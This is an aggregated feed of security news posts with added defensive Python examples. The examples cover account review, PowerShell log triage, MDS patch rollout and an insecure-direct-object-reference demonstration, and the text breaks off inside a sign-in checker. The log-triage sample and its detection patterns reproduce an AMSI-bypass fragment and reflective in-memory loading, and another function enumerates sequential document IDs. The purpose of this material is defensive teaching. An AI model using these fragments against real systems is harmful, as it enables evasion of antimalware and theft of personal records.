Axonius announced the availability of its cybersecurity asset management app on Cortex by Palo Alto Networks – the industry’s only open and integrated AI-based continuous security platform. Building on Cortex allows partners to use normalized and stitched together data from customers’ entire enterprises to build cloud-based apps that constantly deliver innovative cybersecurity capabilities to joint customers. The cybersecurity asset management platform from Axonius gives organizations complete visibility and automated policy validation on all assets, devices, … More

The post Axonius cybersecurity asset management app now available on Cortex by Palo Alto Networks appeared first on Help Net Security.

Google white hat hacker found code execution flaw in Notepad

The popular white hat hacker Tavis Ormandy has announced the discovery of a code execution vulnerability in Microsoft’s Notepad text editor.

The Google Project Zero researcher Tavis Ormandy announced the discovery of a code execution flaw in Microsoft’s Notepad text editor.

Ormandy reported the issue to Microsoft and, in line with Google’s vulnerability disclosure policy, will wait 90 days before revealing technical details of the flaw.

Of course, Ormandy could also disclose the details earlier, once Microsoft releases a security patch addressing the issue.

Ormandy said the vulnerability is a memory corruption bug and shared on Twitter an image demonstrating how to “pop a shell in Notepad.”

The image shows the vulnerability being exploited to launch a Command Prompt; the expert confirmed he has already developed a “real exploit” for the issue.


A message published by Chaouki Bekrar, founder of zero-day broker Zerodium, suggests that this type of issue is not uncommon to find. The real surprise, according to Bekrar, is finding an expert who reports it to Microsoft instead of exploiting it or trying to sell it.

Stay tuned …

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Notepad, hacking)

The post Google white hat hacker found code execution flaw in Notepad appeared first on Security Affairs.

Victoria’s Public Health System “Highly Vulnerable”: Report

Victoria’s public health system is “highly vulnerable” to a Singapore-like data breach, according to a recent report.

According to a recently released Auditor-General report, the public health system in Victoria is vulnerable to an attack like the one Singapore experienced last year, which led to the exfiltration of almost 1.5 million patient health records.

The report by the auditor general reads, “Victoria’s public health system is highly vulnerable to the kind of cyberattacks recently experienced by the National Health Service (NHS) in England, in Singapore, and at a Melbourne‐based cardiology provider, which resulted in stolen or unusable patient data and disrupted hospital services.”

The report further explains that there are key weaknesses in the “physical security” and “logical security” of the health services. This includes critical aspects like password management and other user access controls. Low data security awareness among the staff, which increases the success of social engineering attacks (like phishing or tailgating into corporate areas where ICT infrastructure and servers may be located), is also highlighted in the report.

The audit covered three health services, namely Barwon Health (BH), the Royal Children’s Hospital (RCH) and the Royal Victorian Eye and Ear Hospital (RVEEH), plus two different areas of the DHHS (Department of Health and Human Services). The Auditor-General’s team managed to exploit security vulnerabilities and access patient data in all four agencies.

The report notes, “The audited health services are not proactive enough, and do not take a whole‐of‐hospital approach to security that recognises that protecting patient data is not just a task for their IT staff.”

It was also noted that health services relied on external services providers, but at the same time, they were not fully aware of the security controls implemented by the platforms that these providers were using.

“The three audited health services are not fully aware of whether their service providers have the necessary security controls. Due to the sector’s reliance on third‐party vendors, health services need to actively monitor vendor performance to ensure that patient data is safe,” says the report.

Victoria’s public health services, which manage their ICT systems independently, are supported on cybersecurity by DHHS’s Digital Health branch, which develops guidance materials, runs awareness and training sessions and funds ICT infrastructure upgrades. Digital Health has also developed a set of 72 baseline cybersecurity controls that health services need to implement by 2020-21. But none of the public health services in Victoria has fully implemented these 72 controls to date, and they cite various reasons for this.

The audit report explains, “While Digital Health has set a clear roadmap for health services to follow, to date no health service has fully implemented the 72 controls. The audited health services advise that barriers to implementing the controls include a lack of dedicated cybersecurity staff and insufficient resources for ICT projects.”

“While it may be challenging for health services to balance ICT security against clinical projects, implementing all the controls will provide health services with strong baseline protection against cybersecurity risks. Recent, local examples of cyberattacks in health services demonstrate the need for this work to occur,” the report points out.

That there are no penalties for non-compliance is perhaps another reason for the slow implementation of the controls.

The audit report also brought to light issues with access control management. It found unused accounts, as well as accounts of terminated employees, that were still enabled, and a lack of regular user access reviews. The health services did not keep the user access forms needed to show that access had been authorised. The audit also revealed that many passwords, even on administrator accounts, were easily guessable; some were still system defaults. Health services also rarely used multi-factor authentication, even for ICT staff and administrator accounts.
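The access-review gap the audit describes is the kind of check that can be automated against an account export reconciled with HR data. The following is an added example, not code from the audit or from any of the health services; the export format, column names, rows and the 90-day staleness threshold are all constructed assumptions. It raises the three findings the paragraph lists: enabled accounts belonging to terminated staff, enabled accounts nobody has used for a long time, and administrator accounts without multi-factor authentication.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed account export, as an identity system joined with an HR feed might produce.
# Column names and rows are assumptions for the example, not data from the Victorian audit.
ACCOUNT_EXPORT = """\
username,enabled,last_logon,hr_status,is_admin,mfa_enrolled
jsmith,true,2019-05-20,active,false,false
abrown,true,2018-11-02,terminated,false,false
svc_backup,true,2019-01-15,active,true,false
mwong,true,2019-05-27,active,true,true
tnguyen,false,2018-06-30,terminated,false,false
clee,true,2019-01-03,active,false,false
"""


def _flag(value):
    return value.strip().lower() == "true"


def review_accounts(export_text, as_of, stale_days=90):
    """Return a list of (username, finding) pairs; one account can raise several findings.

    Disabled accounts are skipped: the review is about access that is still usable.
    `as_of` is the review date as YYYY-MM-DD so the result is reproducible."""
    as_of_dt = datetime.strptime(as_of, "%Y-%m-%d")
    findings = []
    for row in csv.DictReader(io.StringIO(export_text)):
        if not _flag(row["enabled"]):
            continue
        user = row["username"]
        last_logon = datetime.strptime(row["last_logon"], "%Y-%m-%d")
        if row["hr_status"].strip().lower() == "terminated":
            findings.append((user, "enabled account belongs to a terminated employee"))
        if as_of_dt - last_logon > timedelta(days=stale_days):
            findings.append((user, "enabled account unused for more than %d days" % stale_days))
        if _flag(row["is_admin"]) and not _flag(row["mfa_enrolled"]):
            findings.append((user, "administrator account without multi-factor authentication"))
    return findings


def accounts_to_disable(findings):
    """Accounts whose findings justify disabling outright (terminated owner or long unused)."""
    return sorted({user for user, text in findings
                   if "terminated" in text or "unused" in text})


if __name__ == "__main__":
    results = review_accounts(ACCOUNT_EXPORT, "2019-05-29")
    for user, text in results:
        print("%-12s %s" % (user, text))
    print("disable:", accounts_to_disable(results))
```

On the constructed rows the terminated user abrown and the service account svc_backup each raise two findings, clee is flagged as stale, and the disabled tnguyen account is ignored even though its owner has left. In practice the `hr_status` join is the hard part: an account review that only looks at the directory cannot tell a quiet-but-legitimate account from one whose owner left months ago.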

The report from the Auditor-General’s office also includes a detailed list of recommendations to be followed.

Related Resources:

How Financial Apps Could Render You Vulnerable to Attacks

Vulnerable Legacy Systems Used By Banks, Need A Careful Review

MacOS AirMail 3 App, Vulnerable to Email Leaks

Are Apps Like Slack And Dropbox Actually Vulnerable To Attack?

The post Victoria’s Public Health System “Highly Vulnerable”: Report appeared first on .

Should Failing Phish Tests Be a Fireable Offense?

Would your average Internet user be any more vigilant against phishing scams if he or she faced the real possibility of losing their job after falling for one too many of these emails? Recently, I met someone at a conference who said his employer had in fact terminated employees for such repeated infractions. As this was the first time I’d ever heard of an organization actually doing this, I asked some phishing experts what they thought (spoiler alert: they’re not fans of this particular teaching approach).

John LaCour is founder and chief technology officer of PhishLabs, a Charleston, S.C. based firm that helps companies educate and test employees on how not to fall for phishing scams. The company’s training courses offer customers a way to track how many employees open the phishing email tests and how many fall for the lure.

LaCour says enacting punitive measures for employees who repeatedly fall for phishing tests is counterproductive.

“We’ve heard from some of our clients in the financial industry that have similar programs where there are real consequences when people fail the tests, but it’s pretty rare across all types of businesses to have a policy that extreme,” LaCour said.

“There are a lot of things that organizations can do that aren’t as draconian and still have the desired effect of making security posture stronger,” he said. “We’ve seen companies require classroom training on the first failure, to a manager has to sit through it with you on the second time, to revoking network access in some cases.”

LaCour said one of the most common mistakes he sees is companies that purchase a tool to launch simulated phishing campaigns just to play “gotcha” with employees.

“It really demotivates people, and it doesn’t really teach them anything about how to be more diligent about phishing attacks,” he said. “Each phishing simulation program needs to be accompanied by a robust training program, where you teach employees what to do when they see something phishy. Otherwise, it just creates resentment among employees.”

Rohyt Belani, CEO of Leesburg, Va.-based security firm Cofense (formerly PhishMe), said anti-phishing education campaigns that employ strongly negative consequences for employees who repeatedly fall for phishing tests usually create tension and distrust between employees and the company’s security team.

“It can create an environment of animosity for the security team because they suddenly become viewed as working for Human Resources instead of trying to improve security,” Belani said. “Threatening people usually backfires, and they end up becoming more defiant and uncooperative.”

Cofense provides a phish reporting system and encourages customers to have their employees flag suspected phishing attacks (and tests), and Belani said those employee reports can often stymie real phishing attacks.

“So what happens a lot of times is a person may click on a link in a real phishing email, and three seconds later realize, ‘Oops, I shouldn’t have clicked, let me report it anyway’,” Belani said. “But if that person knew there was a punitive angle to doing so, they’re more likely not to report it and to say, ‘You know what, I didn’t do it. Where’s the proof I clicked on the link?'”

LaCour says PhishLabs encourages clients to use positive reinforcement in their employee training campaigns.

“Recognition — where employees and departments that do especially well are acknowledged — is very common,” LaCour said. “We also see things like small gifts or other things that companies would typically use to reward employees, such as gift cards or small bonuses for specific departments or people.”

LaCour said his offices make a game out of it.

“We make it competitive where we post the scores of each department and the lowest scoring department has to buy lunch for the rest of the department,” he said. “It teaches people there are real consequences and that we all need to be diligent when it comes to phishing.”

What about you, dear readers? Does your employer do phishing awareness training and testing? What incentives or disincentives are tied to those programs? Sound off in the comments below.

25% of Workers Would Give Away Data for £1,000

It's been a year since GDPR came into force, and it seems that businesses are as vulnerable as ever. According to a report by nCipher, 71% of the UK C-suite would be willing to cover up a data breach if they could escape the fines, compared with 57% of managers and directors.

The survey found that while investment in employee training came second only to investment in technology, IT leaders still find they lack support from the board and the wider C-suite, particularly within midsized companies (250–999 employees).

Peter Galvin, chief strategy and marketing officer, nCipher Security, said, “Organizations are under a greater obligation than ever to disclose data breaches, particularly when personal information is at risk, but evidently many IT leaders – particularly at C-Level – still feel they can avoid being subject to fines and other punitive measures from regulatory bodies.”

However, it's not just the C-suite that is putting businesses at risk. According to a report by Deep Secure, almost half of office employees would be willing to sell corporate information to people outside their organization. In a company announcement, the company said that "£1,000 would be enough to tempt 25% of employees to give away company information." Shockingly, 5% would give it away for free.

The What Is the Price of Loyalty report reveals that 10% of respondents would also sell intellectual property, such as product specifications, product code and patents, for £250 or less. The findings also revealed that one in five (19%) of respondents in graduate-level roles admitted that they had been paid to source such information, with 29% of 16–24-year-olds reporting they had been approached by someone they didn’t know to take it.

Dan Turner, CEO of Deep Secure, commented, “The cost of employee loyalty is staggeringly low. With nearly half of all office workers admitting that they would sell their company's and clients’ most sensitive and valuable information, the business risk is not only indisputable but immense in the age of GDPR and where customers no longer tolerate data breaches.

“Given the prevalent use of digital and cyber tactics to exfiltrate this information, it’s critical that businesses invest in a security posture that will help them both detect and prevent company information from leaving the network,” he said.

ESET Exposes Turla Malware Attacks on European Diplomats

Turla, an infamous advanced persistent threat (APT) group, is using new PowerShell-based tools that provide direct, in-memory loading and execution of malware, executables and libraries. Researchers at ESET detected several attacks against diplomatic entities in Eastern Europe using PowerShell scripts, linking them to the group.

Turla is believed to have been operating since at least 2008, when it successfully breached the U.S. military. It has also been involved in major attacks against many government entities in Europe and the Middle East, among them the German Foreign Office and the French military. The group is also known as Snake or Uroburos.

According to Malwarebytes Labs, Turla uses what is thought to be Russian governmental malware. It has infected Linux and Mac operating systems but is mostly associated with infecting Windows systems. 

The PowerShell-based tools can bypass detection techniques that trigger when a malicious executable is written to disk. ESET researcher Matthieu Faou believes the tools are also being used globally against "other traditional Turla targets."

The PowerShell loaders, detected by ESET under the umbrella name PowerShell/Turla, differ from simple droppers in that they persist on the system and regularly load the embedded executables directly into memory, so the payload itself never touches disk. In some samples, Turla developers modified their PowerShell scripts to bypass the Antimalware Scan Interface (AMSI), leaving the antimalware product unable to receive script content from AMSI for scanning.

“Along with Turla’s new PowerShell loader, we’ve discovered and analyzed several interesting payloads, including an RPC-based backdoor and a PowerShell backdoor leveraging Microsoft’s cloud storage service, OneDrive, as its command-and-control [C&C] server,” said Faou. “However, these techniques do not prevent the detection of the actual malicious payloads in memory."

One of the payloads ESET discovered is a whole set of backdoors relying on the RPC protocol, used to perform lateral movement and take control of other machines on the local network without relying on an external C&C server.

“We believe this backdoor is a recovery access tool in case the main Turla backdoors are removed and operators can no longer access the compromised computers,” said Faou.
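One way to hunt for the behaviour ESET describes in your own PowerShell script block logs (Event ID 4104, with script block logging enabled), as an added example that is not ESET's detection logic: the records below are constructed, and the indicator regexes are an assumption about what in-memory loading, AMSI tampering and persistence look like in ScriptBlockText, not signatures for PowerShell/Turla.

```python
"""Added example, not from ESET's report: triage PowerShell script block logs
(Event ID 4104) for the behaviours described above, in-memory loading of
embedded executables and AMSI tampering, and for the persistence that the
loaders rely on. Log records are constructed; the indicator list is an
assumption, not ESET's detection logic."""
import re

# Constructed 4104 records: (host, ScriptBlockText).
SCRIPT_BLOCKS = [
    ("ws-diplo-01", "Get-ChildItem C:\\Users -Recurse | Measure-Object"),
    ("ws-diplo-02", "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                    ".GetField('amsiInitFailed','NonPublic,Static')"),
    ("ws-diplo-02", "$b=[Convert]::FromBase64String($blob);"
                    "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"),
    ("ws-diplo-03", "Register-ScheduledTask -TaskName Updater -Action $a -Trigger $t"),
]

# Indicator categories (assumed; tune to your environment).
INDICATORS = {
    "amsi-tamper": [
        re.compile(r"amsiInitFailed", re.I),
        re.compile(r"AmsiScanBuffer", re.I),
        re.compile(r"AmsiUtils", re.I),
    ],
    "in-memory-load": [
        re.compile(r"\[System\.Reflection\.Assembly\]::Load\(", re.I),
        re.compile(r"\[Reflection\.Assembly\]::Load\(", re.I),
        re.compile(r"FromBase64String", re.I),
    ],
    "persistence": [
        re.compile(r"Register-ScheduledTask", re.I),
        re.compile(r"New-ItemProperty .*\\Run", re.I),
    ],
}


def classify_block(text):
    """Return the set of indicator categories matched by one script block."""
    return {cat for cat, pats in INDICATORS.items() if any(p.search(text) for p in pats)}


def triage(records):
    """Aggregate categories per host; hosts with no hits are dropped."""
    per_host = {}
    for host, text in records:
        per_host.setdefault(host, set()).update(classify_block(text))
    return {h: sorted(c) for h, c in per_host.items() if c}


def high_confidence(per_host):
    """A host showing both AMSI tampering and in-memory loading is what the
    loader described above would look like in the logs."""
    return sorted(h for h, cats in per_host.items()
                  if "amsi-tamper" in cats and "in-memory-load" in cats)


if __name__ == "__main__":
    hits = triage(SCRIPT_BLOCKS)
    for host, cats in hits.items():
        print(host, ", ".join(cats))
    print("high confidence:", high_confidence(hits))
```

The AMSI indicators match the well-known tampering strings; real operators obfuscate them, so treat a single hit as a triage lead rather than proof, and combine categories per host as high_confidence does. Script block logging captures the de-obfuscated block, which is why it is the right log to run this over.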

7 Steps For Proper Patch Management Process

In the wake of Intel’s Microarchitectural Data Sampling (MDS) flaws, system administrators at data centers that depend on Intel microprocessors are hard at work figuring out how to roll out the mitigation patches in a timely, effective and efficient manner. Unlike a typical patch management process, mitigating MDS is not an easy undertaking, given that proof-of-concept code is publicly available and can be weaponized at any time. And since MDS is a hardware flaw, the corrective action is penalized by lower performance: as much as 40% with Intel’s Hyper-Threading disabled, according to Apple.

The biggest impact will not be felt by end users but by the enterprise, most especially server farms and cloud service providers that use Intel processors (90% of the market share). In effect, full implementation of the mitigation means that a machine’s value decreases significantly, since it can only deliver a portion of its expected overall performance. AMD and ARM-based processors are not affected by the MDS flaws, but a much smaller number of data centers use them.

Of course, the patch management process may vary from company to company and on a case-by-case basis. A firm that requires a 24/7 machine for a specific critical task may leave it unpatched for MDS if it is a stand-alone, air-gapped (not connected to the public Internet) computer. Meanwhile, a machine with a public interface requires immediate installation of the mitigation patches supplied by Intel, Microsoft, Apple and the Linux distributions.

Here we provide some tips on rolling out an effective patch management process that has minimal impact on employee productivity without compromising IT security:

1. Build/update corporate computing inventory

From day one of company operations, a comprehensive inventory of all computing devices should exist. In the real world this is not always the case; in some companies a complete inventory is an afterthought. For MDS mitigation, where AMD and ARM machines are not affected, a comprehensive inventory shows how many Intel, AMD and ARM machines are currently in use in the organization. This gives the implementing team a baseline for how many machines the patch rollout involves, and therefore an idea of how long the update procedure will take.

2. Establish a list of machines that fully require the patches

Not all machines affected by a flaw or an exploit need to be patched. Yes, you heard it right: we are advocating a reasonable level of patch management, not a perfect one. For MDS mitigation, machines that are air-gapped need not be updated. These non-networked computers perform a specific task and are never used for any other purpose. They are usually secured physically, and there is no way to reach them remotely for a third party to use a weaponized flaw against the machine. That reasoning only holds as long as removable media and physical access to the machine are controlled as strictly as the network is.

3. Define a test machine for simulating full roll-out of patches

Installing patches is the quickest part of any patch management process; however, rolling the patches out to all qualifying machines at the same time only invites further trouble down the line. The combination of application software, drivers and other system updates from the past can complicate things. There will be times when a specific machine does not behave as expected after a patch is installed alongside some other software or driver on the system. Such conflicts can be caught early if the patches are deployed first to test machines, or only to a limited sample of production machines.

4. Backup critical and user data before installing the patches

With the availability of cloud backup and the lower cost of hard drives and other consumer storage devices, there is no valid excuse for not having a credible backup strategy. Backups of the affected machines should be taken before the patch rollout begins. This way, if trouble such as system corruption occurs, the affected system can be restored from the backup painlessly instead of being rebuilt from scratch.

5. IT team to enforce full monitoring of patched machines for the next 24-hours

The first 24 hours after the patches are applied are crucial for monitoring. Once staff members start using the patched machines again, problems may be reported; document them fully, as this helps in formulating a quick workaround or even a permanent fix at a later date.

6. Perform reconfiguration for those that failed to pass the quality test after the patch installation

A failed rollout does not mean leaving the machine unmitigated. Sometimes a small tweak is all that is needed to fix the problem after patching. The procedure may require a Windows Registry edit, following a knowledge base instruction from the software vendor, or swapping commodity hardware such as a network card.

7. Return to step 1

Update the inventory with what was patched, what failed and what was deliberately left out, so the next cycle starts from an accurate baseline.
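The scoping, staging and verification parts of the procedure above carried through in code, as an added example that is not from the original post: it reads a constructed inventory (step 1), drops AMD, ARM and air-gapped hosts from scope (step 2), orders the rollout so test machines go first (step 3), and interprets the Linux kernel's MDS status report for the post-patch check (steps 5 and 6). The inventory columns, the host roles and the sysfs readings are constructed sample data; the sysfs file path and its status strings are the kernel's own.

```python
"""Added example (not from the original post): scope an MDS rollout from a
device inventory, stage it so canaries go first, and verify the result on
Linux hosts from /sys/devices/system/cpu/vulnerabilities/mds.
Inventory columns, roles and readings below are constructed."""
import csv
import io

# Constructed inventory export; the columns are an assumption.
INVENTORY_CSV = """hostname,cpu_vendor,exposure,role
web-01,GenuineIntel,public,web
web-02,GenuineIntel,public,web
db-01,GenuineIntel,internal,database
lab-07,GenuineIntel,airgapped,instrument
ci-02,AuthenticAMD,internal,build
edge-03,ARM,public,sensor
canary-01,GenuineIntel,internal,test
"""


def parse_inventory(text):
    """Step 1: the inventory as a list of dicts, one per host."""
    return list(csv.DictReader(io.StringIO(text)))


def needs_mds_patch(host):
    """Step 2: MDS affects Intel CPUs; air-gapped boxes are left out on purpose."""
    return host["cpu_vendor"] == "GenuineIntel" and host["exposure"] != "airgapped"


def rollout_batches(hosts, canary_roles=("test",)):
    """Step 3: order in-scope hosts as canaries, then public-facing, then the rest."""
    in_scope = [h for h in hosts if needs_mds_patch(h)]
    canary = [h for h in in_scope if h["role"] in canary_roles]
    public = [h for h in in_scope if h not in canary and h["exposure"] == "public"]
    rest = [h for h in in_scope if h not in canary and h not in public]
    return [[h["hostname"] for h in b] for b in (canary, public, rest) if b]


def mds_mitigated(sysfs_value):
    """Interpret the kernel's mds status line.
    Returns (cpu_buffers_cleared, smt_safe); 'Not affected' counts as both."""
    v = sysfs_value.strip()
    if v == "Not affected":
        return True, True
    cleared = v.startswith("Mitigation: Clear CPU buffers")
    smt_safe = "SMT disabled" in v or "SMT mitigated" in v
    return cleared, smt_safe


# Constructed post-patch readings (what `cat .../vulnerabilities/mds` returned).
SYSFS_READINGS = {
    "web-01": "Mitigation: Clear CPU buffers; SMT disabled",
    "web-02": "Mitigation: Clear CPU buffers; SMT vulnerable",
    "db-01": "Vulnerable: Clear CPU buffers attempted, no microcode; SMT vulnerable",
    "ci-02": "Not affected",
}


def verify(readings):
    """Steps 5 and 6: hosts that still need work after the rollout, with the reason."""
    problems = {}
    for host, value in readings.items():
        cleared, smt_safe = mds_mitigated(value)
        if not cleared:
            problems[host] = "microcode/kernel mitigation missing"
        elif not smt_safe:
            problems[host] = "mitigated but SMT still enabled"
    return problems


if __name__ == "__main__":
    hosts = parse_inventory(INVENTORY_CSV)
    for i, batch in enumerate(rollout_batches(hosts), 1):
        print(f"batch {i}: {', '.join(batch)}")
    for host, why in verify(SYSFS_READINGS).items():
        print(f"{host}: {why}")
```

The "mitigated but SMT still enabled" case is the performance trade-off the post opens with: the kernel reports it honestly, and whether a host is allowed to stay in that state is a decision to record per host, not something to discover by accident later. On Windows the equivalent check is Microsoft's SpeculationControl PowerShell module, not shown here.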

The post 7 Steps For Proper Patch Management Process appeared first on .

Impersonation Phishing Attacks Up 67% in Last 12 Months

Mimecast has released its third annual State of Email Security Report and has found that phishing attacks have lost companies money, data and customers. Including insights from 1,025 global IT decision-makers, the report found that social engineering attacks were on the rise.

According to the study, phishing attacks were the most prominent type of cyber-attack, with 94% of respondents having experienced phishing and spear-phishing attacks in the previous 12 months. Over half (55%) cited seeing an increase in that same period.  

Most notably, the report found that impersonation attacks increased by over two-thirds (67%), with 73% of organizations impacted by impersonation attacks having experienced a direct loss. Specifically, 28% of businesses lost customers, 29% suffered financially and 40% lost data.

This surge has meant that people within organizations are losing confidence in their security. According to the report, 61% believe it is likely or inevitable their company will suffer a negative business impact from an email-borne attack this year. 

“Email security systems are the frontline defense for most attacks. Yet just having and providing data on these attacks is not what creates value for most respondents,” says Josh Douglas, vice president of threat intelligence at Mimecast. “Survey results indicate that vendors need to be able to provide actionable intelligence out of the mass of data they collect and not just focus on indicators of compromise which would only address past problems."

According to the company's announcement on the findings, the top five industries being impacted by impersonation attacks are financial, manufacturing, professional services, science/technology and transportation. 

Other interesting statistics include: 

  • Ransomware attacks are up 26% in comparison to last year.
  • Nearly 50% of respondents noted having downtime for two to three days.
  • Just under a third experienced downtime for four to five days.

Was Your Mortgage Deal One of Nearly 900 Million Recently Exposed?

First American Financial Corp. left hundreds of millions of sensitive financial documents unprotected on its website dating back as far as 2003.

The security hole, discovered by Washington real estate developer Ben Shoval and reported by security expert Brian Krebs, allowed anyone with a web browser full access to digitized records related to mortgage deals. Among the leaked information were bank account numbers, Social Security numbers, and scans of driver licenses.

The documents on the site were accessible by simply changing a single digit in a valid URL. The company used a sequential nine-digit number for every document on its site, starting at 000000075, with each successive number corresponding to another person’s document.
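The access pattern just described, next to a hardened form, as an added example that is not First American's code (their application is not public): a read path keyed by a sequential number with no check on who is asking, beside a store that uses unguessable identifiers and checks ownership on every read. Records, users and identifiers are constructed.

```python
"""Added example (not First American's code): the sequential-identifier,
no-ownership-check flaw described above, beside a hardened version.
Records and users are constructed."""
import secrets

# Constructed store keyed by a sequential nine-digit record number.
DOCS_BY_SEQ = {
    "000000075": {"owner": "alice", "title": "Closing statement"},
    "000000076": {"owner": "bob",   "title": "Driver licence scan"},
    "000000077": {"owner": "carol", "title": "Bank statement"},
}


def fetch_vulnerable(doc_id):
    """The flaw: any caller gets any record just by knowing (or guessing) its number."""
    return DOCS_BY_SEQ.get(doc_id)


def enumerate_vulnerable(start, count):
    """What an outsider can do against fetch_vulnerable: walk the sequence."""
    found = []
    for n in range(int(start), int(start) + count):
        doc_id = f"{n:09d}"
        doc = fetch_vulnerable(doc_id)
        if doc:
            found.append((doc_id, doc["owner"]))
    return found


class DocumentStore:
    """Hardened: random opaque ids and an ownership check on every read.
    Assumes `requester` has already been authenticated by the caller."""

    def __init__(self):
        self._docs = {}

    def add(self, owner, title):
        doc_id = secrets.token_urlsafe(16)  # 128 random bits; cannot be counted up
        self._docs[doc_id] = {"owner": owner, "title": title}
        return doc_id

    def fetch(self, requester, doc_id):
        doc = self._docs.get(doc_id)
        # Same answer for "no such document" and "not yours": no existence oracle.
        if doc is None or doc["owner"] != requester:
            return None
        return doc


if __name__ == "__main__":
    print(enumerate_vulnerable("000000075", 3))
    store = DocumentStore()
    link = store.add("alice", "Closing statement")
    print(store.fetch("alice", link))  # the owner's record
    print(store.fetch("bob", link))    # None
```

Random identifiers alone are not a substitute for the ownership check: a link that is shared or leaked would still open for anyone. The ownership check alone is the real access control; the unguessable identifier just removes the "change one digit" shortcut that turned a single exposed record into hundreds of millions.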

“As of the morning of May 24, was returning documents up to the present day (885,000,000+), including many PDFs and post-dated forms for upcoming real estate closings,” Krebs reported on his findings.

“The title insurance agency collects all kinds of documents from both the buyer and seller, including Social Security numbers, driver licenses, account statements, and even internal corporate documents if you’re a small business,” Shoval said. “You give them all kinds of private information and you expect that to stay private.”

First American took the exposed website offline on the afternoon of Friday, May 24th, and a spokesperson released the following statement:

“First American has learned of a design defect in an application that made possible unauthorized access to customer data.  At First American, security, privacy and confidentiality are of the highest priority and we are committed to protecting our customers’ information. The company took immediate action to address the situation and shut down external access to the application. We are currently evaluating what effect, if any, this had on the security of customer information. We will have no further comment until our internal review is completed.”

You can read more about the data leak here.

The post Was Your Mortgage Deal One of Nearly 900 Million Recently Exposed? appeared first on Adam Levin.

New TrustArc Research Reports on Consumer Privacy Attitudes One Year Into GDPR Enforcement Era

May 25, 2019 marked the one year anniversary of the EU General Data Protection Regulation enforcement deadline. In the last twelve months, companies across the globe have been working diligently to achieve and maintain compliance under the regulation. The GDPR significantly increased the requirements on how businesses address consumer individual rights. Companies have been tasked with putting processes and systems in place in order to receive, escalate, and accommodate consumer requests. Failure to comply with the GDPR can result in fines, loss of reputation, and expenses associated with responding to any compliance investigations. During the IAPP Global Privacy Summit in …

The post New TrustArc Research Reports on Consumer Privacy Attitudes One Year Into GDPR Enforcement Era appeared first on TrustArc Blog.

Office 365 phishing

Let’s be honest: administering email is a pain. Routing issues, disk quotas, bouncebacks, the times when users can send but not receive emails, receive but not send, or they flat out cannot send or receive—the list goes on.

It’s no wonder that email-hosting services like Office 365 have become so popular. Such cloud-based email services remove a lot of the headaches caused by email configuration. They even include basic security features, meant to keep users safe from the latest threats.

They also provide options to simplify the user experience. Users can go directly to an Office 365 web page, enter their company credentials and log right into their email accounts from anywhere they like.

Take all this into account, add the reduction in costs that cloud email solutions often bring, and it sounds like the perfect solution. As a result, the use of services like Office 365 has skyrocketed.

Attackers have taken notice

Of course, its popularity has led to malicious attacks. Attackers are crafting and launching phishing campaigns targeting Office 365 users. The attackers attempt to steal a user’s login credentials with the goal of taking over the accounts. If successful, attackers can often log into the compromised accounts, and perform a wide variety of malicious activity:

  • Spread malware, spam, and phishing emails from within the internal network.
  • Carry out tailored attacks such as spear phishing and Business Email Compromise.
  • Target partners and customers.

At first glance, this may not seem very different than external email-based attacks. However, there is one critical difference: The malicious emails sent are now coming from legitimate accounts. For the recipient, it’s often even someone that they know, eliciting trust in a way that would not necessarily be afforded to an unknown source. To make things more complicated, attackers often leverage “conversation hijacking,” where they deliver their payload by replying to an email that’s already located in the compromised inbox.

Figure 1 – An example Office 365 phishing email.

Reconnaissance attacks

However, there’s so much more that an attacker can do besides sending emails. Once an attacker has access to a legitimate mailbox, they can also do the following:

  • Obtain global company email address lists.
  • Scan mailbox for other credentials, personal information, or company information.
  • Attempt to gain further access to company resources.

These activities can go unnoticed, simply because the attacker is gathering information while logged in using authorized credentials. This gives the attacker time for reconnaissance: a chance to observe and plan additional attacks. Nor will this type of attack set off a security alert in the same way something like a brute-force attack against a webmail client will, where the attacker guesses password after password until they get in or are detected.

The attack chain

The methods used by attackers to gain access to an Office 365 account are fairly straightforward. The phishing campaigns usually take the form of an email that appears to come from Microsoft. The email contains a request to log in, claiming the user needs to reset their password, hasn’t logged in recently, or that there’s a problem with the account that needs their attention. A URL is included, enticing the reader to click to remedy the issue.

The chain of events usually plays out like this:

  1. Attacker sends a phishing email that appears to come from Microsoft or another trusted source.
  2. User clicks on link in the email, which brings them to a page mimicking the Office 365 login page.
  3. User enters login credentials, which are scooped up by the attackers.
  4. The fake page does nothing, says that the login is incorrect, or redirects the user to the real Office 365 login page.

Given this series of events, the user would be none-the-wiser that their credentials had been stolen.

Figure 2 – Office 365 login vs. phishing login. Can you spot the difference?

The frequency of attacks

How successful are these attacks? While it’s unlikely anyone but the attackers would have data on the number of stolen credentials, or overall success rate, we can draw a few conclusions by looking at the phishing emails.

Agari Data Inc. is one company that monitors a variety of data points surrounding phishing campaigns. In fact, in their quarterly Email Fraud and Identity Deception Trends report, they often look at brand impersonation trends and provided some fresh numbers for us.

Over the last few quarters, there has been a steady increase in the number of phishing emails impersonating Microsoft. While Microsoft has long been the most commonly impersonated brand, it now accounts for more than half of all brand impersonations seen in the last quarter.

Figure 3 – Brand Impersonation Phishing Emails masquerading as “Microsoft”

Cloud email security efficacy

To its credit, Microsoft has baked a number of security technologies into its Office 365 offerings. However, given that these phishing attacks take place off Microsoft’s network, there is very little that can be done from within the cloud to protect against them. If an attacker gains valid credentials and uses them, how can you tell the difference based on a login attempt?

Fortunately, there are several steps you can take to further protect your email:

  • Use multi-factor authentication. If a login attempt requires a secondary authorization before someone is allowed access to an inbox, this will stop many attackers, even with phished credentials.
  • Deploy advanced anti-phishing technologies. Some machine-learning technologies can use local identity and relationship modeling alongside behavioral analytics to spot deception-based threats.
  • Run regular phishing exercises. Regular, mandated phishing exercises across the entire organization will help to train employees to recognize phishing emails, so that they don’t click on malicious URLs, or enter their credentials into malicious websites. For instance, Duo offers a free phishing simulation tool, called Duo Insight.
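The question above, how to tell a phished-credential login from the real user, can be partly answered from sign-in logs after the fact. As an added example that is not part of the Cisco post, this flags a user whose successful sign-ins come from two countries closer together in time than travel allows, and any success from a country the user has never signed in from. The records and the baseline are constructed; the field names loosely follow what cloud identity providers export but are an assumption.

```python
"""Added example (not part of the original post): two sign-in log checks,
impossible travel and first-seen country, over constructed records.
Field names are an assumption about an identity provider's export."""
from datetime import datetime, timedelta

# Constructed sign-in records, already sorted by time.
SIGNINS = [
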